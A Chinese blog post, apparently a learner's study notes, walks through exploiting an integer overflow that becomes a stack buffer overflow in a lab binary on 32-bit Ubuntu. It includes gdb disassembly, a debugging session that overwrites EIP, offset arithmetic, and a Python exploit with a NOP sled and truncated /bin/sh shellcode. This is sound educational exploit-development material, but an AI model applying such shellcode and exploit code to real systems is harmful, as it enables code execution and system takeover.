Linux Exploit系列之二 整数溢出

 

整数溢出

 

虚拟机安装:Ubuntu 12.04(x86)

 

什么是整数溢出?

 

存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行,但整数溢出可能会导致堆栈溢出或堆溢出,这可能导致任意代码执行。在这篇文章中,我将仅谈论整数溢出导致堆栈溢出,整数溢出导致堆溢出将在后面的单独的帖子中讨论。

后边的内容复制粘贴好烦,还是说关键点吧!

原文见:https://bbs.pediy.com/thread-216869.htm

这个文章解释的比上一个清楚多了,相信能看懂,唯一不懂的,和上一篇估计一样,还是地址计算的问题

同样是使用gdb 调试:gdb -q vuln

下边解释下我是如何找地址的(虚拟机环境Ubuntu14.04 32位系统,gcc 4.8.2)

首先使用disassemble 查看汇编代码,看看程序的汇编代码布局:

 1 (gdb) disassemble validate_passwd
 2 Dump of assembler code for function validate_passwd:
 3    0x08048507 <+0>:    push   %ebp
 4    0x08048508 <+1>:    mov    %esp,%ebp
 5    0x0804850a <+3>:    sub    $0x28,%esp
 6    0x0804850d <+6>:    mov    0x8(%ebp),%eax
 7    0x08048510 <+9>:    mov    %eax,(%esp)
 8    0x08048513 <+12>:    call   0x80483e0 <strlen@plt>
 9    0x08048518 <+17>:    mov    %al,-0x9(%ebp)
10    0x0804851b <+20>:    cmpb   $0x3,-0x9(%ebp)
11    0x0804851f <+24>:    jbe    0x8048554 <validate_passwd+77>
12    0x08048521 <+26>:    cmpb   $0x8,-0x9(%ebp)
13    0x08048525 <+30>:    ja     0x8048554 <validate_passwd+77>
14    0x08048527 <+32>:    movl   $0x8048670,(%esp)
15    0x0804852e <+39>:    call   0x80483b0 <puts@plt>
16    0x08048533 <+44>:    mov    0x804a040,%eax
17    0x08048538 <+49>:    mov    %eax,(%esp)
18    0x0804853b <+52>:    call   0x8048390 <fflush@plt>
19    0x08048540 <+57>:    mov    0x8(%ebp),%eax
20    0x08048543 <+60>:    mov    %eax,0x4(%esp)
21    0x08048547 <+64>:    lea    -0x14(%ebp),%eax
22    0x0804854a <+67>:    mov    %eax,(%esp)
23    0x0804854d <+70>:    call   0x80483a0 <strcpy@plt>

嗯,发现编译器改动不大,就是将strlen函数直接内嵌了,没有使用函数调用(库函数的惯用做法),不多解释

(gdb) list 看一眼源码,方便下断点

(gdb) b validate_passwd 下断

然后开心的按照作者说的运行

下边是调试步骤

 1 Reading symbols from vuln...done.
 2 (gdb) b validate_passwd
 3 Breakpoint 1 at 0x804850d: file vuln.c, line 14.
 4 (gdb) r sploitfun `python -c 'print "A"*261'`
 5 Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'`
 6 
 7 Breakpoint 1, validate_passwd (
 8     passwd=0xbffff6b6 'A' <repeats 200 times>...) at vuln.c:14
 9 14     unsigned char passwd_len = strlen(passwd); /* [1] */ 
10 (gdb) n        //单步调试,想看看执行到了我们认为的关键的代码没有,很明显这儿还不是关键代码
11 15     if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
12 (gdb) n
13 16      printf("Valid Password\n"); /* [3] */ 
14 (gdb) p passwd_len  //这儿是关键处了,但是如果是正确的话,passwd_len 应该是'A',很可能是程序还没真正执行到
15 $1 = 5 '\005'
16 (gdb) n
17 Valid Password
18 17      fflush(stdout);
19 (gdb) n
20 18      strcpy(passwd_buf,passwd); /* [4] */
21 (gdb) n
22 23     store_passwd_indb(passwd_buf); /* [6] */
23 (gdb) p passwd_len    //好终于到了我们想要的地方了
24 $2 = 65 'A'
25 (gdb) p &passwd_len   //passwd_len的地址,既然利用的是栈,我们在乎的是内存布局
26 $3 = (unsigned char *) 0xbffff46f 'A' <repeats 200 times>...
27 (gdb) p buf        //手误,没有任何原因
28 $4 = 0x0
29 (gdb) n
30 24    }
31 (gdb) p passwd_buf    //passwd_buf的值也对了
32 $5 = 'A' <repeats 11 times>
33 (gdb) p &passwd_buf[0]  //passwd_buf的地址也和我们想象的一样
34 $6 = 0xbffff464 'A' <repeats 200 times>...
35 (gdb) p/x $eip      //很明显还没有被覆盖
36 $7 = 0x8048578
37 (gdb) p/x $ebp      //这个真的不是在凑字数,ebp的地址很重要
38 $8 = 0xbffff478
39 (gdb) n
40 0x41414141 in ?? ()
41 (gdb) p/x $eip      //好,已经覆盖了
42 $9 = 0x41414141
43 (gdb) p/x $ebp
44 $10 = 0x41414141
45 (gdb) 

按照我上边的注释,相信大家对调试过程已经有了一定了解,现在说下地址的计算

$ebp - &passwd_buf[0] +4   = 0x18 = $eip - &passwd_buf[0]

这就是所谓的内存偏移,有了这个,我们的ret_addr就可以算出来了

ret_addr= 0xbffff464 +0x18 + 100

还是老规矩,附上我的exp.python 代码

 1 #exp.py 
 2 #!/usr/bin/env python
 3 import struct
 4 from subprocess import call
 5 
 6 arg1 = "sploitfun"
 7 
 8 #Stack address where shellcode is copied.
 9 ret_addr = 0xbffff4e0
10 
11 #Spawn a shell
12 #execve(/bin/sh)
13 scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\$
14 
15 #endianess convertion
16 def conv(num):
17  return struct.pack("<I",num)#unk + RA + NOP's + Shellcode
18 arg2 = "A" * 24
19 arg2 += conv(ret_addr);
20 arg2 += "\x90" * 100
21 arg2 += scode
22 arg2 += "C" * 108
23 
24 print "Calling vulnerable program"
25 call(["./vuln", arg1, arg2])

 

posted @ 2018-05-04 23:43  转换无极限  阅读(1505)  评论(0编辑  收藏  举报